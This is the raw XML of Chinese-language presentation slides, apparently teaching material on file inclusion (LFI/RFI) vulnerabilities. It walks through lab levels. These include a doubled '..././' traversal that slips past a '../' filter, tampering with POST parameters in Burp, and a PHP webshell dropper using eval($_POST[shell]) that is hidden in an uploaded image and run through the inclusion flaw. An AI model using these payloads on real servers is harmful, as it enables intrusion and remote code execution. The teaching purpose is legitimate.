          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以用什么方式绕过结尾增加的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>怎么访问到其他目录？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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LFI-5</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365885" y="1393190"/>
            <a:ext cx="9204325" cy="5114290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657860" y="1162050"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1401445" y="6489700"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>../  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>替换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>空</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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双写绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LFI-5</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296035" y="1440180"/>
            <a:ext cx="8990965" cy="1630045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>如果我写成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>     .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>./    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>会发生什么？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>被替换为空的时候，上面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>又出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>了！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296035" y="3554095"/>
            <a:ext cx="9639300" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>./.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>，则会变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>../../   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>一直向上级目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>跳转</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330325" y="5332095"/>
            <a:ext cx="9755505" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>使用..././..././phpinfo.php是</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>                 ../../phpinfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>，即可访问到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>phpinfo.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>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LFI-6</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25095" y="1663700"/>
            <a:ext cx="11941175" cy="3652520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214630" y="5764530"/>
            <a:ext cx="11466195" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这里看到是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法传参的，因此需要将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，当你进行传参的时候，其实你是看不到使用什么参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过去的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275590" y="1143635"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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LFI-6-POST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174750" y="1453515"/>
            <a:ext cx="9418320" cy="4899660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139190" y="1085215"/>
            <a:ext cx="9033510" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这时候就需要开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，拦截消息，查看到我们测试输入的参数被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326515" y="6497320"/>
            <a:ext cx="8290560" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以直接在这里进行修改，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>改为文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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标题 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521335" y="1541780"/>
            <a:ext cx="11102340" cy="4707890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>文件包含漏洞（File Inclusion Vulnerability）是一种Web应用程序常见的安全漏洞，通常发生在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>语言中，攻击者可以通过该漏洞加载和执行服务器上的任意文件，甚至执行恶意脚本，获取敏感信息或执行任意代码。文件包含漏洞通常分为两种类型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>    本地文件包含（LFI, Local File Inclusion）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>        本地文件包含漏洞发生在攻击者利用Web应用中的输入参数，将服务器上的本地文件作为响应内容的一部分读取或执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>        攻击者可以通过这个漏洞读取服务器上的敏感文件（如/etc/passwd、配置文件等），甚至执行某些脚本文件，导致信息泄露或远程代码执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>    远程文件包含（RFI, Remote File Inclusion）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>        远程文件包含漏洞允许攻击者通过Web应用程序的输入参数，从外部服务器加载并执行远程的恶意脚本。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>        如果服务器的配置允许从外部资源加载文件，攻击者可以利用这个漏洞上传恶意代码到远程服务器并在目标Web服务器上执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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LFI-6-POST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482090" y="2153920"/>
            <a:ext cx="9227820" cy="3528060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795655" y="1362710"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>或者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>hacker bar post</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>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get shell</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109345" y="1113155"/>
            <a:ext cx="8428355" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应该怎么通过文件包含去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>呢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071880" y="1760855"/>
            <a:ext cx="9862185" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先，假设我们通过文件上传手段传入了一张图像，但是图像里面的内容是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&lt;?php fputs(fopen('shell.php','w'),'&lt;?php eval($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>POST[shell])?&gt;');?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码逻辑：创建打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，在里面写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;?php eval($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST[shell])?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>../echo.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071880" y="3526790"/>
            <a:ext cx="6103620" cy="1630045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071880" y="5206365"/>
            <a:ext cx="9253855" cy="1659890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7539355" y="4118610"/>
            <a:ext cx="2786380" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>创建出来了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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902335" y="1188720"/>
            <a:ext cx="7537450" cy="1169670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902335" y="2494915"/>
            <a:ext cx="9660255" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以把字符串当作命令执行，因此可以执行我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上去的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="902335" y="5043805"/>
            <a:ext cx="5311140" cy="1744980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902335" y="2864485"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先要运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="902335" y="3251200"/>
            <a:ext cx="5311140" cy="1699260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
